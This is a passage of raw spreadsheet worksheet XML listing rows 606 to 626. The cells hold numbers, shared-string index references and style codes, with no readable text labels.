      <c r="N606" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O606" s="29">
        <v>2.0</v>
      </c>
      <c r="P606" s="29">
        <v>5.0</v>
      </c>
      <c r="Q606" s="15"/>
      <c r="R606" s="15"/>
      <c r="S606" s="15"/>
      <c r="T606" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U606" s="5"/>
      <c r="V606" s="5"/>
      <c r="W606" s="47"/>
      <c r="X606" s="45"/>
      <c r="Y606" s="45"/>
      <c r="Z606" s="38" t="s">
        <v>2846</v>
      </c>
      <c r="AA606" s="39" t="s">
        <v>2847</v>
      </c>
      <c r="AB606" s="38" t="s">
        <v>2848</v>
      </c>
      <c r="AC606" s="40">
        <v>182100.0</v>
      </c>
      <c r="AD606" s="5"/>
      <c r="AE606" s="14"/>
      <c r="AF606" s="14"/>
    </row>
    <row r="607">
      <c r="A607" s="6">
        <f t="shared" si="1"/>
        <v>0.7402660476</v>
      </c>
      <c r="B607" s="29">
        <v>1.0</v>
      </c>
      <c r="C607" s="14"/>
      <c r="D607" s="14"/>
      <c r="E607" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F607" s="14"/>
      <c r="G607" s="29">
        <v>1.0</v>
      </c>
      <c r="H607" s="29">
        <v>336.0</v>
      </c>
      <c r="I607" s="15"/>
      <c r="J607" s="5" t="s">
        <v>2849</v>
      </c>
      <c r="K607" s="29">
        <v>6253.0</v>
      </c>
      <c r="L607" s="15"/>
      <c r="M607" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N607" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O607" s="29">
        <v>1.0</v>
      </c>
      <c r="P607" s="29">
        <v>4.0</v>
      </c>
      <c r="Q607" s="15"/>
      <c r="R607" s="15"/>
      <c r="S607" s="15"/>
      <c r="T607" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U607" s="5"/>
      <c r="V607" s="5"/>
      <c r="W607" s="47"/>
      <c r="X607" s="45"/>
      <c r="Y607" s="45"/>
      <c r="Z607" s="38" t="s">
        <v>2850</v>
      </c>
      <c r="AA607" s="39" t="s">
        <v>2851</v>
      </c>
      <c r="AB607" s="38" t="s">
        <v>2852</v>
      </c>
      <c r="AC607" s="40">
        <v>244843.0</v>
      </c>
      <c r="AD607" s="5"/>
      <c r="AE607" s="14"/>
      <c r="AF607" s="14"/>
    </row>
    <row r="608">
      <c r="A608" s="6">
        <f t="shared" si="1"/>
        <v>0.7452136041</v>
      </c>
      <c r="B608" s="29">
        <v>1.0</v>
      </c>
      <c r="C608" s="14"/>
      <c r="D608" s="14"/>
      <c r="E608" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F608" s="14"/>
      <c r="G608" s="29">
        <v>1.0</v>
      </c>
      <c r="H608" s="29">
        <v>391.0</v>
      </c>
      <c r="I608" s="29">
        <v>77334.0</v>
      </c>
      <c r="J608" s="15"/>
      <c r="K608" s="15"/>
      <c r="L608" s="15"/>
      <c r="M608" s="14"/>
      <c r="N608" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O608" s="29">
        <v>0.0</v>
      </c>
      <c r="P608" s="29">
        <v>3.0</v>
      </c>
      <c r="Q608" s="15"/>
      <c r="R608" s="15"/>
      <c r="S608" s="15"/>
      <c r="T608" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U608" s="5"/>
      <c r="V608" s="5"/>
      <c r="W608" s="47"/>
      <c r="X608" s="45"/>
      <c r="Y608" s="45"/>
      <c r="Z608" s="38" t="s">
        <v>2853</v>
      </c>
      <c r="AA608" s="39" t="s">
        <v>2854</v>
      </c>
      <c r="AB608" s="38" t="s">
        <v>2855</v>
      </c>
      <c r="AC608" s="40">
        <v>90118.0</v>
      </c>
      <c r="AD608" s="5"/>
      <c r="AE608" s="14"/>
      <c r="AF608" s="14"/>
    </row>
    <row r="609">
      <c r="A609" s="6">
        <f t="shared" si="1"/>
        <v>0.5530425136</v>
      </c>
      <c r="B609" s="29">
        <v>1.0</v>
      </c>
      <c r="C609" s="29">
        <v>94082.0</v>
      </c>
      <c r="D609" s="14"/>
      <c r="E609" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F609" s="14"/>
      <c r="G609" s="29">
        <v>12.0</v>
      </c>
      <c r="H609" s="29">
        <v>4743.0</v>
      </c>
      <c r="I609" s="29">
        <v>37853.0</v>
      </c>
      <c r="J609" s="15"/>
      <c r="K609" s="29">
        <v>12.0</v>
      </c>
      <c r="L609" s="15"/>
      <c r="M609" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N609" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O609" s="29">
        <v>4.0</v>
      </c>
      <c r="P609" s="29">
        <v>6.0</v>
      </c>
      <c r="Q609" s="15"/>
      <c r="R609" s="15"/>
      <c r="S609" s="15"/>
      <c r="T609" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U609" s="5"/>
      <c r="V609" s="5"/>
      <c r="W609" s="47"/>
      <c r="X609" s="45"/>
      <c r="Y609" s="45"/>
      <c r="Z609" s="38" t="s">
        <v>2856</v>
      </c>
      <c r="AA609" s="39" t="s">
        <v>2857</v>
      </c>
      <c r="AB609" s="38" t="s">
        <v>2858</v>
      </c>
      <c r="AC609" s="40">
        <v>94070.0</v>
      </c>
      <c r="AD609" s="5"/>
      <c r="AE609" s="14"/>
      <c r="AF609" s="14"/>
    </row>
    <row r="610">
      <c r="A610" s="6">
        <f t="shared" si="1"/>
        <v>0.2990143876</v>
      </c>
      <c r="B610" s="29">
        <v>1.0</v>
      </c>
      <c r="C610" s="29">
        <v>190921.0</v>
      </c>
      <c r="D610" s="14"/>
      <c r="E610" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F610" s="14"/>
      <c r="G610" s="29">
        <v>1.0</v>
      </c>
      <c r="H610" s="29">
        <v>705.0</v>
      </c>
      <c r="I610" s="29">
        <v>36398.0</v>
      </c>
      <c r="J610" s="15"/>
      <c r="K610" s="29">
        <v>5133.0</v>
      </c>
      <c r="L610" s="15"/>
      <c r="M610" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N610" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O610" s="29">
        <v>1.0</v>
      </c>
      <c r="P610" s="29">
        <v>0.0</v>
      </c>
      <c r="Q610" s="15"/>
      <c r="R610" s="15"/>
      <c r="S610" s="15"/>
      <c r="T610" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U610" s="5"/>
      <c r="V610" s="5"/>
      <c r="W610" s="47"/>
      <c r="X610" s="45"/>
      <c r="Y610" s="45"/>
      <c r="Z610" s="38" t="s">
        <v>2859</v>
      </c>
      <c r="AA610" s="39" t="s">
        <v>2860</v>
      </c>
      <c r="AB610" s="38" t="s">
        <v>2861</v>
      </c>
      <c r="AC610" s="40">
        <v>190873.0</v>
      </c>
      <c r="AD610" s="5"/>
      <c r="AE610" s="14"/>
      <c r="AF610" s="14"/>
    </row>
    <row r="611">
      <c r="A611" s="6">
        <f t="shared" si="1"/>
        <v>0.5506627998</v>
      </c>
      <c r="B611" s="29">
        <v>1.0</v>
      </c>
      <c r="C611" s="29">
        <v>232906.0</v>
      </c>
      <c r="D611" s="14"/>
      <c r="E611" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F611" s="14"/>
      <c r="G611" s="29">
        <v>1.0</v>
      </c>
      <c r="H611" s="29">
        <v>84.0</v>
      </c>
      <c r="I611" s="29">
        <v>214755.0</v>
      </c>
      <c r="J611" s="15"/>
      <c r="K611" s="15"/>
      <c r="L611" s="15"/>
      <c r="M611" s="15"/>
      <c r="N611" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O611" s="29">
        <v>1.0</v>
      </c>
      <c r="P611" s="29">
        <v>0.0</v>
      </c>
      <c r="Q611" s="29">
        <v>0.0</v>
      </c>
      <c r="R611" s="15"/>
      <c r="S611" s="15"/>
      <c r="T611" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U611" s="5"/>
      <c r="V611" s="5"/>
      <c r="W611" s="47"/>
      <c r="X611" s="45"/>
      <c r="Y611" s="45"/>
      <c r="Z611" s="38" t="s">
        <v>2862</v>
      </c>
      <c r="AA611" s="39" t="s">
        <v>2863</v>
      </c>
      <c r="AB611" s="38" t="s">
        <v>2864</v>
      </c>
      <c r="AC611" s="40">
        <v>232900.0</v>
      </c>
      <c r="AD611" s="5"/>
      <c r="AE611" s="14"/>
      <c r="AF611" s="14"/>
    </row>
    <row r="612">
      <c r="A612" s="6">
        <f t="shared" si="1"/>
        <v>0.9366622157</v>
      </c>
      <c r="B612" s="29">
        <v>1.0</v>
      </c>
      <c r="C612" s="15"/>
      <c r="D612" s="14"/>
      <c r="E612" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F612" s="14"/>
      <c r="G612" s="29">
        <v>2.0</v>
      </c>
      <c r="H612" s="29">
        <v>202.0</v>
      </c>
      <c r="I612" s="29">
        <v>36538.0</v>
      </c>
      <c r="J612" s="15"/>
      <c r="K612" s="15"/>
      <c r="L612" s="15"/>
      <c r="M612" s="15"/>
      <c r="N612" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O612" s="29">
        <v>1.0</v>
      </c>
      <c r="P612" s="29">
        <v>0.0</v>
      </c>
      <c r="Q612" s="15"/>
      <c r="R612" s="15"/>
      <c r="S612" s="15"/>
      <c r="T612" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U612" s="5"/>
      <c r="V612" s="5"/>
      <c r="W612" s="47"/>
      <c r="X612" s="45"/>
      <c r="Y612" s="45"/>
      <c r="Z612" s="38" t="s">
        <v>2865</v>
      </c>
      <c r="AA612" s="39" t="s">
        <v>2866</v>
      </c>
      <c r="AB612" s="38" t="s">
        <v>2867</v>
      </c>
      <c r="AC612" s="40">
        <v>92810.0</v>
      </c>
      <c r="AD612" s="5"/>
      <c r="AE612" s="14"/>
      <c r="AF612" s="14"/>
    </row>
    <row r="613">
      <c r="A613" s="6">
        <f t="shared" si="1"/>
        <v>0.05842284245</v>
      </c>
      <c r="B613" s="29">
        <v>1.0</v>
      </c>
      <c r="C613" s="29">
        <v>145711.0</v>
      </c>
      <c r="D613" s="14"/>
      <c r="E613" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F613" s="14"/>
      <c r="G613" s="29">
        <v>-1.0</v>
      </c>
      <c r="H613" s="29">
        <v>129.0</v>
      </c>
      <c r="I613" s="29">
        <v>105533.0</v>
      </c>
      <c r="J613" s="15"/>
      <c r="K613" s="29">
        <v>105533.0</v>
      </c>
      <c r="L613" s="15"/>
      <c r="M613" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N613" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O613" s="29">
        <v>1.0</v>
      </c>
      <c r="P613" s="29">
        <v>3.0</v>
      </c>
      <c r="Q613" s="15"/>
      <c r="R613" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S613" s="15"/>
      <c r="T613" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U613" s="5"/>
      <c r="V613" s="5"/>
      <c r="W613" s="47"/>
      <c r="X613" s="45"/>
      <c r="Y613" s="45"/>
      <c r="Z613" s="38" t="s">
        <v>2868</v>
      </c>
      <c r="AA613" s="39" t="s">
        <v>2869</v>
      </c>
      <c r="AB613" s="38" t="s">
        <v>2870</v>
      </c>
      <c r="AC613" s="40">
        <v>145703.0</v>
      </c>
      <c r="AD613" s="5"/>
      <c r="AE613" s="14"/>
      <c r="AF613" s="14"/>
    </row>
    <row r="614">
      <c r="A614" s="6">
        <f t="shared" si="1"/>
        <v>0.965525332</v>
      </c>
      <c r="B614" s="29">
        <v>1.0</v>
      </c>
      <c r="C614" s="29">
        <v>99894.0</v>
      </c>
      <c r="D614" s="14"/>
      <c r="E614" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F614" s="14"/>
      <c r="G614" s="29">
        <v>22.0</v>
      </c>
      <c r="H614" s="29">
        <v>11164.0</v>
      </c>
      <c r="I614" s="29">
        <v>86371.0</v>
      </c>
      <c r="J614" s="15"/>
      <c r="K614" s="29">
        <v>82435.0</v>
      </c>
      <c r="L614" s="15"/>
      <c r="M614" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N614" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O614" s="29">
        <v>8.0</v>
      </c>
      <c r="P614" s="29">
        <v>5.0</v>
      </c>
      <c r="Q614" s="15"/>
      <c r="R614" s="15"/>
      <c r="S614" s="15"/>
      <c r="T614" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U614" s="5"/>
      <c r="V614" s="5"/>
      <c r="W614" s="47"/>
      <c r="X614" s="45"/>
      <c r="Y614" s="45"/>
      <c r="Z614" s="38" t="s">
        <v>2871</v>
      </c>
      <c r="AA614" s="39" t="s">
        <v>2872</v>
      </c>
      <c r="AB614" s="38" t="s">
        <v>2873</v>
      </c>
      <c r="AC614" s="40">
        <v>99892.0</v>
      </c>
      <c r="AD614" s="5"/>
      <c r="AE614" s="14"/>
      <c r="AF614" s="14"/>
    </row>
    <row r="615">
      <c r="A615" s="6">
        <f t="shared" si="1"/>
        <v>0.422217863</v>
      </c>
      <c r="B615" s="29">
        <v>1.0</v>
      </c>
      <c r="C615" s="29">
        <v>29404.0</v>
      </c>
      <c r="D615" s="14"/>
      <c r="E615" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F615" s="14"/>
      <c r="G615" s="29">
        <v>11.0</v>
      </c>
      <c r="H615" s="29">
        <v>2042.0</v>
      </c>
      <c r="I615" s="29">
        <v>1472.0</v>
      </c>
      <c r="J615" s="15"/>
      <c r="K615" s="29">
        <v>-1.0</v>
      </c>
      <c r="L615" s="15"/>
      <c r="M615" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N615" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O615" s="29">
        <v>3.0</v>
      </c>
      <c r="P615" s="29">
        <v>1.0</v>
      </c>
      <c r="Q615" s="15"/>
      <c r="R615" s="15"/>
      <c r="S615" s="15"/>
      <c r="T615" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U615" s="5"/>
      <c r="V615" s="5"/>
      <c r="W615" s="47"/>
      <c r="X615" s="45"/>
      <c r="Y615" s="45"/>
      <c r="Z615" s="38" t="s">
        <v>2874</v>
      </c>
      <c r="AA615" s="39" t="s">
        <v>2875</v>
      </c>
      <c r="AB615" s="38" t="s">
        <v>2876</v>
      </c>
      <c r="AC615" s="40">
        <v>16318.0</v>
      </c>
      <c r="AD615" s="5"/>
      <c r="AE615" s="14"/>
      <c r="AF615" s="14"/>
    </row>
    <row r="616">
      <c r="A616" s="6">
        <f t="shared" si="1"/>
        <v>0.6647165368</v>
      </c>
      <c r="B616" s="29">
        <v>1.0</v>
      </c>
      <c r="C616" s="14"/>
      <c r="D616" s="14"/>
      <c r="E616" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F616" s="14"/>
      <c r="G616" s="29">
        <v>-1.0</v>
      </c>
      <c r="H616" s="29">
        <v>154.0</v>
      </c>
      <c r="I616" s="29">
        <v>91353.0</v>
      </c>
      <c r="J616" s="15"/>
      <c r="K616" s="15"/>
      <c r="L616" s="15"/>
      <c r="M616" s="14"/>
      <c r="N616" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O616" s="29">
        <v>1.0</v>
      </c>
      <c r="P616" s="29">
        <v>2.0</v>
      </c>
      <c r="Q616" s="15"/>
      <c r="R616" s="15"/>
      <c r="S616" s="15"/>
      <c r="T616" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U616" s="5"/>
      <c r="V616" s="5"/>
      <c r="W616" s="47"/>
      <c r="X616" s="45"/>
      <c r="Y616" s="45"/>
      <c r="Z616" s="38" t="s">
        <v>2877</v>
      </c>
      <c r="AA616" s="39" t="s">
        <v>2878</v>
      </c>
      <c r="AB616" s="38" t="s">
        <v>2879</v>
      </c>
      <c r="AC616" s="40">
        <v>199684.0</v>
      </c>
      <c r="AD616" s="5"/>
      <c r="AE616" s="14"/>
      <c r="AF616" s="14"/>
    </row>
    <row r="617">
      <c r="A617" s="6">
        <f t="shared" si="1"/>
        <v>0.4560823263</v>
      </c>
      <c r="B617" s="29">
        <v>1.0</v>
      </c>
      <c r="C617" s="15"/>
      <c r="D617" s="14"/>
      <c r="E617" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F617" s="14"/>
      <c r="G617" s="29">
        <v>2.0</v>
      </c>
      <c r="H617" s="29">
        <v>300.0</v>
      </c>
      <c r="I617" s="29">
        <v>23781.0</v>
      </c>
      <c r="J617" s="15"/>
      <c r="K617" s="15"/>
      <c r="L617" s="15"/>
      <c r="M617" s="15"/>
      <c r="N617" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O617" s="29">
        <v>1.0</v>
      </c>
      <c r="P617" s="29">
        <v>5.0</v>
      </c>
      <c r="Q617" s="15"/>
      <c r="R617" s="15"/>
      <c r="S617" s="15"/>
      <c r="T617" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U617" s="5"/>
      <c r="V617" s="5"/>
      <c r="W617" s="47"/>
      <c r="X617" s="45"/>
      <c r="Y617" s="45"/>
      <c r="Z617" s="38" t="s">
        <v>2880</v>
      </c>
      <c r="AA617" s="39" t="s">
        <v>2881</v>
      </c>
      <c r="AB617" s="38" t="s">
        <v>2132</v>
      </c>
      <c r="AC617" s="40">
        <v>169563.0</v>
      </c>
      <c r="AD617" s="5"/>
      <c r="AE617" s="14"/>
      <c r="AF617" s="14"/>
    </row>
    <row r="618">
      <c r="A618" s="6">
        <f t="shared" si="1"/>
        <v>0.07840806342</v>
      </c>
      <c r="B618" s="29">
        <v>1.0</v>
      </c>
      <c r="C618" s="15"/>
      <c r="D618" s="14"/>
      <c r="E618" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F618" s="14"/>
      <c r="G618" s="29">
        <v>3.0</v>
      </c>
      <c r="H618" s="29">
        <v>352.0</v>
      </c>
      <c r="I618" s="29">
        <v>190837.0</v>
      </c>
      <c r="J618" s="15"/>
      <c r="K618" s="29">
        <v>184205.0</v>
      </c>
      <c r="L618" s="15"/>
      <c r="M618" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N618" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O618" s="29">
        <v>1.0</v>
      </c>
      <c r="P618" s="29">
        <v>6.0</v>
      </c>
      <c r="Q618" s="15"/>
      <c r="R618" s="15"/>
      <c r="S618" s="15"/>
      <c r="T618" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U618" s="5"/>
      <c r="V618" s="5"/>
      <c r="W618" s="47"/>
      <c r="X618" s="45"/>
      <c r="Y618" s="45"/>
      <c r="Z618" s="38" t="s">
        <v>2882</v>
      </c>
      <c r="AA618" s="39" t="s">
        <v>2883</v>
      </c>
      <c r="AB618" s="38" t="s">
        <v>2884</v>
      </c>
      <c r="AC618" s="40">
        <v>205118.0</v>
      </c>
      <c r="AD618" s="5"/>
      <c r="AE618" s="14"/>
      <c r="AF618" s="14"/>
    </row>
    <row r="619">
      <c r="A619" s="6">
        <f t="shared" si="1"/>
        <v>0.08553468137</v>
      </c>
      <c r="B619" s="29">
        <v>1.0</v>
      </c>
      <c r="C619" s="29">
        <v>6380.0</v>
      </c>
      <c r="D619" s="14"/>
      <c r="E619" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F619" s="14"/>
      <c r="G619" s="29">
        <v>12.0</v>
      </c>
      <c r="H619" s="29">
        <v>831.0</v>
      </c>
      <c r="I619" s="29">
        <v>4377.0</v>
      </c>
      <c r="J619" s="15"/>
      <c r="K619" s="29">
        <v>33.0</v>
      </c>
      <c r="L619" s="15"/>
      <c r="M619" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N619" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O619" s="29">
        <v>3.0</v>
      </c>
      <c r="P619" s="29">
        <v>0.0</v>
      </c>
      <c r="Q619" s="15"/>
      <c r="R619" s="15"/>
      <c r="S619" s="15"/>
      <c r="T619" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U619" s="5"/>
      <c r="V619" s="5"/>
      <c r="W619" s="47"/>
      <c r="X619" s="45"/>
      <c r="Y619" s="45"/>
      <c r="Z619" s="38" t="s">
        <v>2885</v>
      </c>
      <c r="AA619" s="39" t="s">
        <v>2886</v>
      </c>
      <c r="AB619" s="38" t="s">
        <v>2887</v>
      </c>
      <c r="AC619" s="40">
        <v>6377.0</v>
      </c>
      <c r="AD619" s="5"/>
      <c r="AE619" s="14"/>
      <c r="AF619" s="14"/>
    </row>
    <row r="620">
      <c r="A620" s="6">
        <f t="shared" si="1"/>
        <v>0.7234553945</v>
      </c>
      <c r="B620" s="29">
        <v>1.0</v>
      </c>
      <c r="C620" s="29">
        <v>140345.0</v>
      </c>
      <c r="D620" s="14"/>
      <c r="E620" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F620" s="14"/>
      <c r="G620" s="29">
        <v>13.0</v>
      </c>
      <c r="H620" s="29">
        <v>33017.0</v>
      </c>
      <c r="I620" s="29">
        <v>81648.0</v>
      </c>
      <c r="J620" s="15"/>
      <c r="K620" s="15"/>
      <c r="L620" s="15"/>
      <c r="M620" s="15"/>
      <c r="N620" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O620" s="29">
        <v>4.0</v>
      </c>
      <c r="P620" s="29">
        <v>3.0</v>
      </c>
      <c r="Q620" s="15"/>
      <c r="R620" s="15"/>
      <c r="S620" s="15"/>
      <c r="T620" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U620" s="5"/>
      <c r="V620" s="5"/>
      <c r="W620" s="47"/>
      <c r="X620" s="45"/>
      <c r="Y620" s="45"/>
      <c r="Z620" s="38" t="s">
        <v>2888</v>
      </c>
      <c r="AA620" s="39" t="s">
        <v>2889</v>
      </c>
      <c r="AB620" s="38" t="s">
        <v>1296</v>
      </c>
      <c r="AC620" s="40">
        <v>140343.0</v>
      </c>
      <c r="AD620" s="5"/>
      <c r="AE620" s="14"/>
      <c r="AF620" s="14"/>
    </row>
    <row r="621">
      <c r="A621" s="6">
        <f t="shared" si="1"/>
        <v>0.4673102642</v>
      </c>
      <c r="B621" s="29">
        <v>1.0</v>
      </c>
      <c r="C621" s="29">
        <v>244986.0</v>
      </c>
      <c r="D621" s="14"/>
      <c r="E621" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F621" s="14"/>
      <c r="G621" s="29">
        <v>3.0</v>
      </c>
      <c r="H621" s="29">
        <v>276.0</v>
      </c>
      <c r="I621" s="29">
        <v>251297.0</v>
      </c>
      <c r="J621" s="15"/>
      <c r="K621" s="15"/>
      <c r="L621" s="15"/>
      <c r="M621" s="14"/>
      <c r="N621" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O621" s="29">
        <v>2.0</v>
      </c>
      <c r="P621" s="29">
        <v>1.0</v>
      </c>
      <c r="Q621" s="15"/>
      <c r="R621" s="15"/>
      <c r="S621" s="15"/>
      <c r="T621" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U621" s="5"/>
      <c r="V621" s="5"/>
      <c r="W621" s="47"/>
      <c r="X621" s="45"/>
      <c r="Y621" s="45"/>
      <c r="Z621" s="38" t="s">
        <v>2890</v>
      </c>
      <c r="AA621" s="39" t="s">
        <v>2891</v>
      </c>
      <c r="AB621" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC621" s="40">
        <v>244981.0</v>
      </c>
      <c r="AD621" s="5"/>
      <c r="AE621" s="14"/>
      <c r="AF621" s="14"/>
    </row>
    <row r="622">
      <c r="A622" s="6">
        <f t="shared" si="1"/>
        <v>0.4641353233</v>
      </c>
      <c r="B622" s="29">
        <v>1.0</v>
      </c>
      <c r="C622" s="29">
        <v>85783.0</v>
      </c>
      <c r="D622" s="14"/>
      <c r="E622" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F622" s="14"/>
      <c r="G622" s="29">
        <v>2.0</v>
      </c>
      <c r="H622" s="29">
        <v>3537.0</v>
      </c>
      <c r="I622" s="29">
        <v>72250.0</v>
      </c>
      <c r="J622" s="15"/>
      <c r="K622" s="15"/>
      <c r="L622" s="15"/>
      <c r="M622" s="15"/>
      <c r="N622" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O622" s="29">
        <v>2.0</v>
      </c>
      <c r="P622" s="29">
        <v>1.0</v>
      </c>
      <c r="Q622" s="15"/>
      <c r="R622" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S622" s="15"/>
      <c r="T622" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U622" s="5"/>
      <c r="V622" s="5"/>
      <c r="W622" s="47"/>
      <c r="X622" s="45"/>
      <c r="Y622" s="45"/>
      <c r="Z622" s="38" t="s">
        <v>2892</v>
      </c>
      <c r="AA622" s="39" t="s">
        <v>2893</v>
      </c>
      <c r="AB622" s="38" t="s">
        <v>2894</v>
      </c>
      <c r="AC622" s="40">
        <v>85767.0</v>
      </c>
      <c r="AD622" s="5"/>
      <c r="AE622" s="14"/>
      <c r="AF622" s="14"/>
    </row>
    <row r="623">
      <c r="A623" s="6">
        <f t="shared" si="1"/>
        <v>0.8133337019</v>
      </c>
      <c r="B623" s="29">
        <v>1.0</v>
      </c>
      <c r="C623" s="15"/>
      <c r="D623" s="14"/>
      <c r="E623" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F623" s="14"/>
      <c r="G623" s="29">
        <v>3.0</v>
      </c>
      <c r="H623" s="29">
        <v>1378.0</v>
      </c>
      <c r="I623" s="29">
        <v>51774.0</v>
      </c>
      <c r="J623" s="15"/>
      <c r="K623" s="29">
        <v>8340.0</v>
      </c>
      <c r="L623" s="15"/>
      <c r="M623" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N623" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O623" s="29">
        <v>3.0</v>
      </c>
      <c r="P623" s="29">
        <v>0.0</v>
      </c>
      <c r="Q623" s="15"/>
      <c r="R623" s="15"/>
      <c r="S623" s="15"/>
      <c r="T623" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U623" s="5"/>
      <c r="V623" s="5"/>
      <c r="W623" s="47"/>
      <c r="X623" s="45"/>
      <c r="Y623" s="45"/>
      <c r="Z623" s="38" t="s">
        <v>2895</v>
      </c>
      <c r="AA623" s="39" t="s">
        <v>2896</v>
      </c>
      <c r="AB623" s="38" t="s">
        <v>2897</v>
      </c>
      <c r="AC623" s="40">
        <v>62940.0</v>
      </c>
      <c r="AD623" s="5"/>
      <c r="AE623" s="14"/>
      <c r="AF623" s="14"/>
    </row>
    <row r="624">
      <c r="A624" s="6">
        <f t="shared" si="1"/>
        <v>0.2798617634</v>
      </c>
      <c r="B624" s="29">
        <v>1.0</v>
      </c>
      <c r="C624" s="29">
        <v>37332.0</v>
      </c>
      <c r="D624" s="14"/>
      <c r="E624" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F624" s="14"/>
      <c r="G624" s="29">
        <v>3.0</v>
      </c>
      <c r="H624" s="29">
        <v>1288.0</v>
      </c>
      <c r="I624" s="29">
        <v>11801.0</v>
      </c>
      <c r="J624" s="15"/>
      <c r="K624" s="29">
        <v>11801.0</v>
      </c>
      <c r="L624" s="15"/>
      <c r="M624" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N624" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O624" s="29">
        <v>1.0</v>
      </c>
      <c r="P624" s="29">
        <v>3.0</v>
      </c>
      <c r="Q624" s="15"/>
      <c r="R624" s="15"/>
      <c r="S624" s="15"/>
      <c r="T624" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U624" s="5"/>
      <c r="V624" s="5"/>
      <c r="W624" s="47"/>
      <c r="X624" s="45"/>
      <c r="Y624" s="45"/>
      <c r="Z624" s="38" t="s">
        <v>2898</v>
      </c>
      <c r="AA624" s="39" t="s">
        <v>2899</v>
      </c>
      <c r="AB624" s="38" t="s">
        <v>2900</v>
      </c>
      <c r="AC624" s="40">
        <v>37327.0</v>
      </c>
      <c r="AD624" s="5"/>
      <c r="AE624" s="14"/>
      <c r="AF624" s="14"/>
    </row>
    <row r="625">
      <c r="A625" s="6">
        <f t="shared" si="1"/>
        <v>0.8431374567</v>
      </c>
      <c r="B625" s="29">
        <v>1.0</v>
      </c>
      <c r="C625" s="29">
        <v>215488.0</v>
      </c>
      <c r="D625" s="14"/>
      <c r="E625" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F625" s="14"/>
      <c r="G625" s="29">
        <v>2.0</v>
      </c>
      <c r="H625" s="29">
        <v>299.0</v>
      </c>
      <c r="I625" s="29">
        <v>214804.0</v>
      </c>
      <c r="J625" s="15"/>
      <c r="K625" s="15"/>
      <c r="L625" s="15"/>
      <c r="M625" s="15"/>
      <c r="N625" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O625" s="29">
        <v>3.0</v>
      </c>
      <c r="P625" s="29">
        <v>1.0</v>
      </c>
      <c r="Q625" s="15"/>
      <c r="R625" s="15"/>
      <c r="S625" s="15"/>
      <c r="T625" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U625" s="5"/>
      <c r="V625" s="5"/>
      <c r="W625" s="47"/>
      <c r="X625" s="45"/>
      <c r="Y625" s="45"/>
      <c r="Z625" s="38" t="s">
        <v>1057</v>
      </c>
      <c r="AA625" s="39" t="s">
        <v>1058</v>
      </c>
      <c r="AB625" s="38" t="s">
        <v>2901</v>
      </c>
      <c r="AC625" s="40">
        <v>215484.0</v>
      </c>
      <c r="AD625" s="5"/>
      <c r="AE625" s="14"/>
      <c r="AF625" s="14"/>
    </row>
    <row r="626">
      <c r="A626" s="6">
        <f t="shared" si="1"/>
        <v>0.4349178593</v>
      </c>
      <c r="B626" s="29">
        <v>1.0</v>
      </c>
      <c r="C626" s="14"/>
